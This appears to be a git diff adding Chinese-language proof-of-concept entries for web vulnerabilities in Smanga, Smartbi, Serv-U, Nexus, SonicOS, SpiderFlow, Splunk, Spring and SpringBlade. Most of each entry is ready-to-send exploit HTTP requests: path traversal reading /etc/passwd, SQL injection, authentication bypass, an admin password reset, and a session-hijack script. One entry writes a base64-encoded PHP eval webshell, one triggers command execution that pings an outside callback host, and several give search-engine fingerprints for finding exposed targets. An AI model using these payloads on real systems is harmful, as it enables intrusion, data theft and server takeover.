+![1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0.png](./img/SNJ9xiUHBOpb3lvb/1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0-090368.png)
+
+# 四、漏洞复现
+```java
+POST /php/get-file-flow.php HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
+Cookie: thinkphp_show_page_trace=0|0
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 39
+
+file=../../../../../../../../etc/passwd
+```
+
+![1704897506388-882229d5-e4a4-452e-9b33-c85efb044957.png](./img/SNJ9xiUHBOpb3lvb/1704897506388-882229d5-e4a4-452e-9b33-c85efb044957-170447.png)
+
+
+
+> 更新: 2024-02-29 23:55:42  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fgkpb2mlbe6egiwy>
\ No newline at end of file
diff --git a/SmangamediaId存在SQL注入漏洞.md b/SmangamediaId存在SQL注入漏洞.md
new file mode 100644
index 0000000..9e7e7f6
--- /dev/null
+++ b/SmangamediaId存在SQL注入漏洞.md
@@ -0,0 +1,59 @@
+# Smanga mediaId存在SQL注入漏洞
+
+# 一、漏洞简介
+Smanga无需配置，docker直装的漫画流媒体阅读工具。以emby plex为灵感，为解决漫画阅读需求而开发的漫画阅读器。Smanga mediaId存在SQL注入漏洞.
+
+# 二、影响版本
++ Smanga
+
+# 三、资产测绘
++ hunter`web.title=="smanga"`
++ 特征
+
+![1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0.png](./img/B-CxjmEk9QXAmBoF/1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0-400765.png)
+
+# 四、漏洞复现
+```java
+POST /php/history/add.php HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
+Cookie: thinkphp_show_page_trace=0|0
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 196
+
+chapterCover=1&chapterId=1' AND (SELECT 6064 FROM (SELECT(SLEEP(5)))bcUs) AND 'IwYx'='IwYx&chapterName=1&chatpterPath=1&chaptertype=image&keyword=1&mangaCover=undefined&mangaId=1&mangaName=&mediaId=1&timestamp=12123123&userId=1
+```
+
+![1704897270150-b9afaf47-d6ee-43ba-a9bb-6acd85c5a8f7.png](./img/B-CxjmEk9QXAmBoF/1704897270150-b9afaf47-d6ee-43ba-a9bb-6acd85c5a8f7-394159.png)
+
+sqlmap
+
+```java
+POST /php/history/add.php HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
+Cookie: thinkphp_show_page_trace=0|0
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 196
+
+chapterCover=1&chapterId=1&chapterName=1&chatpterPath=1&chaptertype=image&keyword=1&mangaCover=undefined&mangaId=1&mangaName=&mediaId=1&timestamp=12123123&userId=1
+```
+
+![1704897297677-8ec32e97-be60-4261-aacb-709fb1457a99.png](./img/B-CxjmEk9QXAmBoF/1704897297677-8ec32e97-be60-4261-aacb-709fb1457a99-346321.png)
+
+
+
+> 更新: 2024-02-29 23:55:42  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ip5new4ve7mtypcf>
\ No newline at end of file
diff --git a/Smanga未授权远程代码执行漏洞(CVE-2023-36076).md b/Smanga未授权远程代码执行漏洞(CVE-2023-36076).md
new file mode 100644
index 0000000..6063d30
--- /dev/null
+++ b/Smanga未授权远程代码执行漏洞(CVE-2023-36076).md
@@ -0,0 +1,74 @@
+# Smanga未授权远程代码执行漏洞(CVE-2023-36076)
+
+# 一、漏洞简介
+Smanga无需配置，docker直装的漫画流媒体阅读工具。以emby plex为灵感，为解决漫画阅读需求而开发的漫画阅读器。在/php/manga/delete.php接口处存在未授权远程代码执行漏洞，攻击者可在目标主机执行任意命令，获取服务器权限。
+
+# 二、影响版本
++ Smanga
+
+# 三、资产测绘
++ hunter`web.title=="smanga"`
++ 特征
+
+![1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0.png](./img/6zH2rDbEXutDEKrx/1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0-384375.png)
+
+# 四、漏洞复现
+```java
+POST /php/manga/delete.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
+If-None-Match: "63ff3602-c6d"
+If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 360
+
+mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo `whoami` > 1.txt;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true
+```
+
+![1704896774471-f0fafe1c-b1a8-4039-b32b-dcc54e0e2d59.png](./img/6zH2rDbEXutDEKrx/1704896774471-f0fafe1c-b1a8-4039-b32b-dcc54e0e2d59-384132.png)
+
+获取命令执行结果
+
+```java
+GET /php/manga/1.txt HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 0
+```
+
+![1704896808454-1fdfd6bb-66bc-4487-8f91-e6b908e9efce.png](./img/6zH2rDbEXutDEKrx/1704896808454-1fdfd6bb-66bc-4487-8f91-e6b908e9efce-693600.png)
+
+写入webshell
+
+```java
+POST /php/manga/delete.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
+If-None-Match: "63ff3602-c6d"
+If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 360
+
+mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo PD9waHAgY2xhc3MgR3c2UVBoNjYgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg4OTBhKXsgQGV2YWwoIi8qWjlZczlnSVY3MyovIi4kSDg5MGEuIi8qWjlZczlnSVY3MyovIik7IH19bmV3IEd3NlFQaDY2KCRfUkVRVUVTVFsneCddKTs/Pg== | base64 -d > 1.php;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true
+```
+
+webshell地址
+
+```java
+/php/manga/1.php
+```
+
+![1704896888984-0b313d0c-dfd8-48a8-98e3-00edde806d77.png](./img/6zH2rDbEXutDEKrx/1704896888984-0b313d0c-dfd8-48a8-98e3-00edde806d77-383079.png)
+
+
+
+> 更新: 2024-02-29 23:55:42  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fgwxzim62xadgc33>
\ No newline at end of file
diff --git a/Smart-S85F-任意文件读取.md b/Smart-S85F-任意文件读取.md
new file mode 100644
index 0000000..674cfc6
--- /dev/null
+++ b/Smart-S85F-任意文件读取.md
@@ -0,0 +1,17 @@
+## Smart S85F 任意文件读取
+```
+GET /log/decodmail.php?file=L2V0Yy9gc2xlZXAke0lGU30xMGAucGNhcA== HTTP/1.1
+Host: x.x.x.x
+Cookie: PHPSESSID=c36d5527fd784aa29748b3b1c50be7bc
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
diff --git a/Smartbi 内置用户登陆绕过.md b/Smartbi 内置用户登陆绕过.md
index 92796cb..bf1b49f 100644
--- a/Smartbi 内置用户登陆绕过.md	
+++ b/Smartbi 内置用户登陆绕过.md	
@@ -2,7 +2,7 @@
 
 ## fofa
 ```
-app="SMARTBI"
+body="gcfutil = jsloader.resolve('smartbi.gcf.gcfutil')"
 ```
 
 ## poc
@@ -21,7 +21,6 @@ Content-Type: application/x-www-form-urlencoded
 Content-Length: 68
 
 className=UserService&methodName=loginFromDB&params=["service","0a"]
-
 ```
 
 ![image](https://github.com/wy876/POC/assets/139549762/419e82b7-4236-416d-91ef-74caf533e8ae)
diff --git a/Smartbi-内置用户登陆绕过.md b/Smartbi-内置用户登陆绕过.md
new file mode 100644
index 0000000..92796cb
--- /dev/null
+++ b/Smartbi-内置用户登陆绕过.md
@@ -0,0 +1,31 @@
+## Smartbi 内置用户登陆绕过
+
+## fofa
+```
+app="SMARTBI"
+```
+
+## poc
+```
+POST /smartbi/vision/RMIServlet HTTP/1.1
+Host: 172.16.170.231:18080
+Pragma: no-cache
+Cache-Control: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 68
+
+className=UserService&methodName=loginFromDB&params=["service","0a"]
+
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/419e82b7-4236-416d-91ef-74caf533e8ae)
+
+
+## 漏洞分析
+- https://exp.ci/2023/06/17/Smartbi-%E5%86%85%E7%BD%AE%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86%E7%BB%95%E8%BF%87%E5%88%86%E6%9E%90/
diff --git a/Smartbi修改用户密码漏洞.md b/Smartbi修改用户密码漏洞.md
new file mode 100644
index 0000000..2aef3e7
--- /dev/null
+++ b/Smartbi修改用户密码漏洞.md
@@ -0,0 +1,24 @@
+# Smartbi修改用户密码漏洞
+
+Smartbi修改用户密码漏洞
+
+## fofa
+
+```javascript
+body="gcfutil = jsloader.resolve('smartbi.gcf.gcfutil')"
+```
+
+## poc
+
+```javascript
+POST /smartbi/vision/RMIServlet HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+className=UserService&methodName=changePasswordEx&params=["admin","","1"]
+```
+
+![9b32574b377d64a607e4dcacea7ebf7e](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251446830.png)
+
+![63b435599730ed2ea73434ef51b23a30](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251447017.png)
\ No newline at end of file
diff --git a/Smartbi内置用户登陆绕过漏洞.md b/Smartbi内置用户登陆绕过漏洞.md
new file mode 100644
index 0000000..995a6d5
--- /dev/null
+++ b/Smartbi内置用户登陆绕过漏洞.md
@@ -0,0 +1,59 @@
+# Smartbi内置用户登陆绕过漏洞
+
+# 一、漏洞简介
+Smartbi大数据分析产品融合BI定义的所有阶段，对接各种业务数据库、数据仓库和大数据分析平台，进行加工处理、分析挖掘和可视化展现；满足所有用户的各种数据分析应用需求，如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等Smartbi在安装时会内置几个用户，在使用特定接口时，可绕过用户身份认证机制获取其身份凭证，随后可使用获取的身份凭证调用后台接口，可能导致敏感信息泄露和代码执行。
+
+# 二、影响版本
++ V7 <= Smartbi <= V10
+
+# 三、资产测绘
+ 
+
++ hunter：`app.name=="SMARTBI 思迈特"`
+
+![1692015464478-003bd803-eb83-4cf4-a640-dadf6bb7867c.png](./img/lnCsT28Xnl-0EUXv/1692015464478-003bd803-eb83-4cf4-a640-dadf6bb7867c-424799.png)
+
++ 登录页面
+
+![1692015491752-22149cdc-3ef4-4506-a96d-72460562ef79.png](./img/lnCsT28Xnl-0EUXv/1692015491752-22149cdc-3ef4-4506-a96d-72460562ef79-181146.png)
+
+# 四、漏洞复现
+1. 访问POC出现如下情况则可能存在漏洞
+
+```plain
+/smartbi/vision/RMIServlet
+```
+
+![1692016139611-568c3342-2a55-46ff-92d8-f1ddc6579731.png](./img/lnCsT28Xnl-0EUXv/1692016139611-568c3342-2a55-46ff-92d8-f1ddc6579731-883447.png)2. 使用POST请求如下params：其中的第一个参数是内置的三个用户名（public、service、system）可随机构造绕过登录,第二个参数是三个账号默认的密文密码(默认值为0a),当响应如下，且`result`参数为`true`时表示存在漏洞。
+
+```plain
+POST /smartbi/vision/RMIServlet HTTP/1.1
+Host: xx.xx.xx.xx
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: identity
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded
+Cookie: JSESSIONID=B08E6669BFA8E9D85FB6BD98411C349C
+Origin: https://smartbi.cy-sys.cn
+Referer: https://smartbi.cy-sys.cn/smartbi/vision/RMIServlet
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
+Content-Length: 81
+
+className=UserService&methodName=loginFromDB&params=["system","0a"]
+```
+
+![1692022082661-3bf7889b-3fb3-4ef3-a1e1-628a7177aa0e.png](./img/lnCsT28Xnl-0EUXv/1692022082661-3bf7889b-3fb3-4ef3-a1e1-628a7177aa0e-823591.png)
+
+3. 访问`https://xx.xx.xx.xx/smartbi/vision/index.jsp`成功进入后台
+
+![1692022285213-e9394429-fba8-4237-8c14-0ec583bf0151.png](./img/lnCsT28Xnl-0EUXv/1692022285213-e9394429-fba8-4237-8c14-0ec583bf0151-880868.png)
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fkhbh9sf2269nv0m>
\ No newline at end of file
diff --git a/SolarWindsServ-U存在目录遍历漏洞(CVE-2024-28995).md b/SolarWindsServ-U存在目录遍历漏洞(CVE-2024-28995).md
new file mode 100644
index 0000000..00323ee
--- /dev/null
+++ b/SolarWindsServ-U存在目录遍历漏洞(CVE-2024-28995).md
@@ -0,0 +1,46 @@
+# SolarWinds Serv-U存在目录遍历漏洞(CVE-2024-28995)
+
+# 一、漏洞简介
+SolarWinds的产品主要面向中小型企业和大型企业的IT部门，提供网络监控、系统管理、数据库管理、安全管理等解决方案，2024年6月，Serv-U 官方 SolarWinds 发布了新补丁，修复了一处目录 遍历Q 致文件读取漏洞(CVE-2024-28995)。Serv-U 的目录遍历漏洞(CVE-2024-28995)是由于在处理路径时缺乏适当的验证。攻击者可以通过传递包含"../"的路径段绕过路径验证，访问任意文件。
+
+# 二、影响版本
+SolarWinds Serv-U FTP Server <= 15.4.2 Hotfix 1
+
+SolarWinds Serv-U Gateway <= 15.4.2 Hotfix 1
+
+SolarWinds Serv-U MFT Server <= 15.4.2 Hotfix 1
+
+# 三、资产测绘
+```plain
+server="Serv-U"
+```
+
+![1718816792242-9264a1a9-21a1-46b7-883c-05bdc2ebd941.png](./img/rz4V_zywIK0VMDWz/1718816792242-9264a1a9-21a1-46b7-883c-05bdc2ebd941-121329.png)
+
+# 四、漏洞复现
+```java
+GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+```
+
+![1718816940899-dad0cdd4-ca21-4852-a979-1ccb1047686a.png](./img/rz4V_zywIK0VMDWz/1718816940899-dad0cdd4-ca21-4852-a979-1ccb1047686a-277040.png)
+
+```java
+GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+```
+
+![1718817173765-53cef411-e387-4a5c-bac9-2b22ffc05443.png](./img/rz4V_zywIK0VMDWz/1718817173765-53cef411-e387-4a5c-bac9-2b22ffc05443-721181.png)
+
+
+
+> 更新: 2024-06-23 23:42:48  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vt3h2cvl0d3cb5do>
\ No newline at end of file
diff --git a/SonatypeNexusRepository3存在目录遍历漏洞.md b/SonatypeNexusRepository3存在目录遍历漏洞.md
new file mode 100644
index 0000000..37fec10
--- /dev/null
+++ b/SonatypeNexusRepository3存在目录遍历漏洞.md
@@ -0,0 +1,31 @@
+# Sonatype Nexus Repository 3存在目录遍历漏洞
+
+# 一、漏洞简介
+ Sonatype Nexus Repository 3是一个universal repository manager，用于管理和代理各种软件组件、工件和依赖项。它支持多种格式，包括Java、npm、PyPI、Docker、 Helm 等。    Sonatype Nexus Repository 3 目录遍历漏洞，恶意攻击者可能利用该漏洞读取服务器上的敏感文件。  
+
+# 二、影响版本
++   Sonatype Nexus Repository 
+
+# 三、资产测绘
++ fofa`app="Nexus-Repository-Manager"`
++ 特征
+
+![1716536322398-f581723f-9518-4a47-ba84-7b1d911984ac.png](./img/On-MgBR8a1x-iDHA/1716536322398-f581723f-9518-4a47-ba84-7b1d911984ac-061105.png)
+
+# 四、漏洞复现
+```plain
+GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
+Host: 162.19.64.171:8081
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+```
+
+![1716536350863-7c1e10d0-08ba-4671-b9a6-739d4a32afbf.png](./img/On-MgBR8a1x-iDHA/1716536350863-7c1e10d0-08ba-4671-b9a6-739d4a32afbf-686669.png)
+
+
+
+> 更新: 2024-06-01 11:14:22  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rx4pgbpa10t7pmtr>
\ No newline at end of file
diff --git a/SonicOS-SSLVPN身份验证绕过漏洞(CVE-2024-53704).md b/SonicOS-SSLVPN身份验证绕过漏洞(CVE-2024-53704).md
new file mode 100644
index 0000000..e20e05a
--- /dev/null
+++ b/SonicOS-SSLVPN身份验证绕过漏洞(CVE-2024-53704).md
@@ -0,0 +1,23 @@
+# SonicOS-SSLVPN身份验证绕过漏洞(CVE-2024-53704)
+
+**SonicWall防火墙的身份验证旁路，允许远程攻击者劫持Active SSL SSL VPN会话并获得未经授权的网络访问，Sononicos版本7.1.x（7.1.1-7058及以上），7.1.2-7019和8.0.0-8035受到影响**。
+
+## poc
+
+```python
+import base64, requests, urllib3, warnings
+warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)
+resp = requests.get(
+    "https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=",
+    cookies={"swap": base64.b64encode(b"\x00" * 32).decode()},
+    verify=False
+)
+print(resp.headers)
+print(resp.body)
+```
+
+
+
+## 漏洞来源
+
+- https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking
\ No newline at end of file
diff --git a/SpiderFlow爬虫平台存在远程命令执行漏洞（CVE-2024-0195）.md b/SpiderFlow爬虫平台存在远程命令执行漏洞（CVE-2024-0195）.md
new file mode 100644
index 0000000..2fa964d
--- /dev/null
+++ b/SpiderFlow爬虫平台存在远程命令执行漏洞（CVE-2024-0195）.md
@@ -0,0 +1,31 @@
+# SpiderFlow爬虫平台存在远程命令执行漏洞（CVE-2024-0195）
+
+# 一、漏洞简介
+SpiderFlow是新一代开源爬虫平台，以图形化方式定义爬虫流程，不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发。该系统/function/save接口存在RCE漏洞，攻击者可以构造恶意命令远控服务器。
+
+# 二、影响版本
++ SpiderFlow爬虫平台 v0.5.0
+
+# 三、资产测绘
++ fofa`app="spiderflow"`
++ 特征
+
+![1725588617253-d0956560-866d-4745-b3bf-b6c473dd9551.png](./img/OjWEtwl7z1fS0Qxs/1725588617253-d0956560-866d-4745-b3bf-b6c473dd9551-660786.png)
+
+# 四、漏洞复现
+```java
+POST /function/save HTTP/1.1
+Host: 
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Content-Length: 142
+
+id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+nccrflrlvu.yutu.eu.org')%3B%7B
+```
+
+![1725588674894-0c5cdc42-26f7-472d-9bd8-afb2199f8abf.png](./img/OjWEtwl7z1fS0Qxs/1725588674894-0c5cdc42-26f7-472d-9bd8-afb2199f8abf-550132.png)
+
+
+
+> 更新: 2024-10-22 09:36:10  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/obeii8pkzzb4154z>
\ No newline at end of file
diff --git a/SplunkEnterprise任意文件读取漏洞(CVE-2024-36991).md b/SplunkEnterprise任意文件读取漏洞(CVE-2024-36991).md
new file mode 100644
index 0000000..d8629c9
--- /dev/null
+++ b/SplunkEnterprise任意文件读取漏洞(CVE-2024-36991).md
@@ -0,0 +1,47 @@
+# Splunk Enterprise任意文件读取漏洞(CVE-2024-36991)
+
+# 一、漏洞简介
+Splunk是美国Splunk公司的一套数据收集分析软件。该软件主要用于收集、索引和分析及其所产生的数据，包括所有IT系统和基础结构（物理、虚拟机和云）生成的数据。Splunk存在安全漏洞。攻击者利用该漏洞可以访问存储在web根文件夹之外的文件和目录。
+
+# 二、影响版本
++ 9.2<=Splunk Enterprise<9.2.2
++ 9.1<=Splunk Enterprise<9.1.5
++ 9.0<=Splunk Enterprise<9.0.10
+
+# 三、资产测绘
++ fofa`app="splunk-Enterprise"`
++ 特征
+
+![1720273720505-3af79a8c-bd30-41f5-b5fb-44ae246c02f3.png](./img/MgsperMvGBWWALbV/1720273720505-3af79a8c-bd30-41f5-b5fb-44ae246c02f3-225104.png)
+
+# 四、漏洞复现
+```http
+GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1
+Host: 
+Accept-Encoding:gzip,deflate,br
+Accept:*/*
+Accept-Language:en-US;q=0.9,en;q=0.8
+User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
+Connection:close
+Cache-Control:max-age=0
+```
+
+![1720273759529-a759e825-7b31-4472-9ef7-19625d1b6ab5.png](./img/MgsperMvGBWWALbV/1720273759529-a759e825-7b31-4472-9ef7-19625d1b6ab5-430061.png)
+
+```http
+GET /zh-CN/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1
+Host: 
+Accept-Encoding:gzip,deflate,br
+Accept:*/*
+Accept-Language:en-US;q=0.9,en;q=0.8
+User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
+Connection:close
+Cache-Control:max-age=0
+```
+
+![1720273792757-5a47a5df-5caf-4007-a33b-0248ab13a19d.png](./img/MgsperMvGBWWALbV/1720273792757-5a47a5df-5caf-4007-a33b-0248ab13a19d-711831.png)
+
+
+
+> 更新: 2024-09-05 23:24:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ovx0hur1ngmfy7f9>
\ No newline at end of file
diff --git a/Spring-Framework路径遍历漏洞(CVE-2024-38816).md b/Spring-Framework路径遍历漏洞(CVE-2024-38816).md
new file mode 100644
index 0000000..0476afd
--- /dev/null
+++ b/Spring-Framework路径遍历漏洞(CVE-2024-38816).md
@@ -0,0 +1,27 @@
+# Spring-Framework路径遍历漏洞(CVE-2024-38816)
+
+Spring Framework受影响版本中，使用WebMvc.fn 或 WebFlux.fn（在Spring Web MVC或Spring WebFlux框架中）提供静态资源的应用程序容易受到路径遍历攻击，当Web 应用程序使用RouterFunctions提供静态资源并且应用程序使用FileSystemResource或类似的配置来从文件系统提供静态文件时，威胁者可构造恶意HTTP请求访问目标文件系统上Spring 应用程序进程有权访问的任意文件，从而导致数据泄露。
+
+## 影响范围
+
+Spring Framework 5.3.0 - 5.3.39
+
+Spring Framework 6.0.0 - 6.0.23
+
+Spring Framework 6.1.0 - 6.1.12
+
+## 漏洞环境
+
+https://github.com/weliveby/cve-2024-38816-demo
+
+## poc
+
+```javascript
+GET /static/%5c/%5c/../../v.txt HTTP/1.1
+Host: 127.0.0.1:8087
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+```
+
+![image-20240929095330475](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409290953532.png)
+
+![image-20240929095436847](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409290954898.png)
\ No newline at end of file
diff --git a/SpringBlade-blade-log存在SQL-注入漏洞.md b/SpringBlade-blade-log存在SQL-注入漏洞.md
new file mode 100644
index 0000000..73adfdf
--- /dev/null
+++ b/SpringBlade-blade-log存在SQL-注入漏洞.md
@@ -0,0 +1,15 @@
+## SpringBlade blade-log存在SQL 注入漏洞
+
+
+## poc
+```
+GET /api/blade-log/error/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1
+Host: 
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
+Accept: application/json, text/plain, */*
+Blade-Auth: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ
+```
+![image](https://github.com/wy876/POC/assets/139549762/59820cee-7b55-4e58-9b65-7b4f5a4bc12d)
+
diff --git a/SpringBlade-export-user-SQL-注入漏洞.md b/SpringBlade-export-user-SQL-注入漏洞.md
new file mode 100644
